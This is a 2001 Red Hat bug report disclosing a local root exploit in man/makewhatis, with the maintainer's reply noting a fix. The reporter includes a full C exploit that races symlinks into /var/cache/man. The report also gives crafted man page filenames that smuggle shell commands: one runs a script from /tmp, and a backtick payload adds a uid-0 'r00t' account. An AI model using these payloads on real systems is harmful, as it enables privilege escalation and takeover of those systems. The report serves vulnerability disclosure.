Bug 41805 - root from gid man.
root from gid man.
Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: man (Show other bugs)
7.0
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Bernhard Rosenkraenzer
Aaron Brown
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2001-05-22 06:57 EDT by Need Real Name
Modified: 2007-04-18 12:33 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-05-22 11:45:47 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Need Real Name 2001-05-22 06:57:07 EDT
Description of Problem:
 gid man has write access to /var/cache/man
 this directory is used badly by /usr/sbin/makewhatis, which is run as root
 daily by /etc/cron.daily/makewhatis.cron. another problem with makewhatis
 allows execution of arbitrary commands as root.

the initial problem arises from the security patch for man-1.5g

----------------------
TMPFILE=/var/cache/man/whatis$$
TMPFILEDIR=/var/cache/man/whatis$$
if [ ! -d $TMPFILEDIR ]; then
        mkdir $TMPFILEDIR
        chmod 0700 $TMPFILEDIR
        if [ -O $TMPFILEDIR ]; then
                TMPFILE=$TMPFILEDIR/w
        fi
fi
----------------------

what would happen if there was a symlink called $TMPFILEDIR there?

if $TMPFILEDIR  is not a dir <- ok... symlinks aren't directories, so that
passes.
	mkdir $TMPFILEDIR  <- fails.
	chmod $TMPFILEDIR <- attempts to chmod the dangling symlink. fails.
	if the file exists, and we are the owner  ... <- nope. $TMPFILE stays the
same. 

and program continues, creating the file pointed at by the symlink.
now we can create any filename we like, anywhere on the filesystem writable
by root.
that in itself is bad enough.

also in /usr/sbin/makewhats
-----------------------------

   if (use_zcat) {
                pipe_cmd = "zcat " filename;
              }

-----------------------------
which is used....
-----------------------------
    if (use_zcat) {
                result = (pipe_cmd | getline);


-----------------------------

how about a manpage named  
'ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;gimmeroot;echo
.1.gz'
and a script in /tmp/gimmeeroot ?



How Reproducible:
 If gid man is gained, as is possible through man-1.5h1-10, the following
exploit will give
root within 24hrs.

Steps to Reproduce:



Exploit man for gid man, and then run this program.

sorry for not attaching the file, but for some reason i have to log in
every page and it
won't accept attachments.


--------------------------------------------------
// man2root.c 
// man 1.5h1 - uid 0 (root) from gid 15 (man) via 
// /etc/cron.daily/makewhatis.cron and /usr/sbin/makewhatis
// - zen-parse 5/13/2001

#include <unistd.h>
#include <stdio.h>

#define TOCREATE "/etc/vulnerable-to-root-exploit-via-man"
//kiddies//
//#define TOCREATE "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd
tmp;export PATH=.;getroot;echo .1.gz"
/////////

int cow(char*s)
{
 int pid;
 if(sscanf(s,"%*s %*s %*s %*s %d",&pid)!=1)
 {
  printf("Something is screwy with /proc/loadavg.\n");
  exit(3);
 }
 return pid;
}

char *milkshake(int pid,char*s)
{
 sprintf(s,"/var/cache/man/whatis%d",pid);
 return s;
}

main()
{
 FILE *procf;
 char procs[1024];
 char evillink[1024];
 int curpid,lastpid;
 if (access("/var/cache/man/",W_OK))
 {
  printf("u need write access to /var/cache man. try manners.c\n");
  printf("to get gid man, then run this program again.\n");
  exit(1);
 }
 if(!(procf=fopen("/proc/loadavg","r"))) 
 {
  printf("opening /proc/loadavg failed.\n");
  printf("this exploit won't work without it.\n");
  exit(2);
 }
 fgets(procs,1024,procf);
 fclose(procf);
 lastpid=cow(procs);
 while(access(TOCREATE,R_OK))
 {
  procf=fopen("/proc/loadavg","r");
  fgets(procs,1024,procf);
  fclose(procf);
  for(curpid=cow(procs);lastpid<=curpid;lastpid++)
  {
   symlink(TOCREATE,milkshake(lastpid,evillink));
  }
 }
}


(this bug also allows root from uucp, via the /var/lock/makewhatis.lock
touching in the same
script)
it also was on of the methods that allowed root from the (now long patched)
libc arbitrary file
creation bug.
Comment 1 Bernhard Rosenkraenzer 2001-05-22 11:45:42 EDT
We haven't used "whatis$$" constructs for generating temporary files for quite 
a while, mktemp eliminates the symlink attack problem.
The latter is still a problem, fixing...

Comment 2 Bernhard Rosenkraenzer 2001-05-22 13:04:42 EDT
Fixed in 1.5i-6
Comment 3 Need Real Name 2001-05-28 04:00:31 EDT
/usr/sbin/makewhatis

if (match(filename, ";") || match(filename, "\\&") || match(filename, "\\|")) {

also should check for `
eg:
`adduser -u 0 -g 0 -p '$1$KbHbi3CB$XIQtPME4VAj5vAuaOW4En.' r00t`.1.gz

adds user r00t:gimmeroot


Note You need to log in before you can comment on or make changes to this bug.